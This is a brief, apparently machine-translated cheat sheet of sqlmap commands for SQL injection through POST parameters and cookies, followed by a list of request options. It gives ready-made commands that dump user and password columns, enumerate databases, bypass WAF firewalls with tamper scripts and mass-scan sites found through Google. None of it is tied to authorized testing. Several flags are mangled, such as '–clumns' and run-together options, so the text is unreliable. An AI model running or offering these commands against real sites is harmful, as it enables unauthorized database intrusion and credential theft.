Sqlmap Post Cookie Injection summary

Sqlmap

Sqlmap Post Injection

Automatically detect
Sqlmap-u "Http://www.xxx.com/news?id=1″–smart–level 3–users

Single Injection
Sqlmap-u "http://www.xxx.com/1.php" –data= "Id=1″

Multiple post value injection
Sqlmap-u "http://www.xxx.com/vuln.php" –data= "query=foobar;id=1″–param-del="; "-f–banner–dbs–users

Automatic injection
Sqlmap-u http://xxxx.xxxx.com/login.asp–forms

Import file Injection
Sqlmap-r key.txt "Name,pass"//Don't know the location of Key.txt

Sign in to post registration

Sqlmap-u "http://www.xxx.com/vuln.php" –data= "query=foobar;id=1″–param-del="; "–cookies=" Login Successful cookie Information "-f–banner– Dbs–users

Sqlmap COOkie Injection

Single Injection
Sqlmap "http://127.0.0.1/base.php" –cookie "Id=1″–dbs–level 2
Sqlmap-u "url" –cookie "id=" –clumns-t table segment –level 2
Sqlmap-u "url" –cookie "id=" –dump-t table Segment-C "User,pass" –level 2

Pseudo-Static injection:

Sqlmap-u Url/x*.html–dbs

Request Delay Injection:
Sqlmap–dbs-u Usr/x*.html–delay 1 (time, optional)
Sqlmap–dbs-u Usr/x*.html–safe-freq 1 (number of times, can be arbitrary)
————————————————————————–

Bypass the WAF firewall:
Sqlmap-u url-v 3–dbs–batch–tamper "space2morehash.py"
1.space2hash.py 2.base64encode.py 3.charencode.py
————————————————————————–

Google Batch Detection injection:
Sqlmap-g keywords

Request::
These options can be used to specify how to connect to the destination URL.

–data=data data strings sent via post
–cookie=cookie HTTP Cookie Header
–cookie-urlencode URL encoding generated by cookie injection
–drop-set-cookie Ignore Set–cookie header information for response
–user-agent=agent specifying the HTTP user–agent header
–random-agent using a randomly selected HTTP User–agent header
–referer=referer specifying the HTTP referer header
–headers=headers line break, add other HTTP headers
–auth-type=atype HTTP Authentication type (base, digest, or NTLM) (Basic, Digest or NTLM)
–auth-cred=acred HTTP Authentication credentials (user name: password)
–auth-cert=acert HTTP Authentication certificate (key_file,cert_file)
–proxy=proxy using an HTTP proxy to connect to the destination URL
–proxy-cred=pcred HTTP proxy authentication credentials (user name: password)
–ignore-proxy ignoring the system default HTTP proxy
–delay=delay delay time in seconds between each HTTP request
–timeout=timeout time to wait for the connection to time out (default is 30 seconds)
–retries=retries time the connection is reconnected after timeout (default 3)
–scope=scope regular expression of filter targets from the provided agent log
–safe-url=safurl URL addresses that are frequently accessed during testing

Sqlmap Post Cookie Injection summary